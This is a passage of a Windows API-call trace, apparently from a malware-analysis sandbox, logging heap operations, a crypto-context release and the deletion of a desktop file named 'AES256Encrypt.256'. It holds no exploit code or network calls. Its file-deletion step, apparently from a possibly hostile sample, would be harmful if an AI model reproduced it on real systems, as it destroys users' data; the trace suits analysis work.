dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0135.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0135.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0135.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0135.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0135.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0135.373] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0135.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0135.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0135.374] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.375] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0135.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0135.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0135.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0135.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0135.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0135.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0135.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0135.377] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0135.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0135.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0135.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0135.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.377] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0135.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0135.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0135.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0135.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0135.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0135.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0135.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0135.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0135.379] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.379] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0135.379] FreeLibrary (hLibModule=0x756e0000) returned 1 [0135.379] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.379] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.379] CloseHandle (hObject=0x2d0) returned 1 [0135.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.381] CloseHandle (hObject=0x2a0) returned 1 [0135.643] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.647] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0135.651] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0135.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0135.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0135.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0135.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0135.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0135.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0135.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0135.656] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/AES256Encrypt.256", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256", lpFilePart=0x8cedf4*="AES256Encrypt.256") returned 0x29 [0135.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0135.657] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256" (normalized: "c:\\users\\fd1hvy\\desktop\\aes256encrypt.256")) returned 0x20 [0135.657] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd42cff4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd42cff4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4368900, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x13800, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="AES256Encrypt.256", cAlternateFileName="AES256~1.256")) returned 0xa87250 [0135.657] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256" (normalized: "c:\\users\\fd1hvy\\desktop\\aes256encrypt.256")) returned 1 [0135.660] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd42cff4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd42cff4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4368900, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x13800, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="AES256Encrypt.256", cAlternateFileName="AES256~1.256")) returned 0 [0135.660] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0135.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0135.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0135.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0135.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0135.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0135.660] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0135.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0135.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0135.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0135.660] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0135.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0135.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0135.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0135.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0135.662] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/AES256Encrypt.256", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256", lpFilePart=0x8cf650*="AES256Encrypt.256") returned 0x29 [0135.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0135.662] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256" (normalized: "c:\\users\\fd1hvy\\desktop\\aes256encrypt.256")) returned 0xffffffff [0135.663] HeapFree (in: hHeap=0x970000, 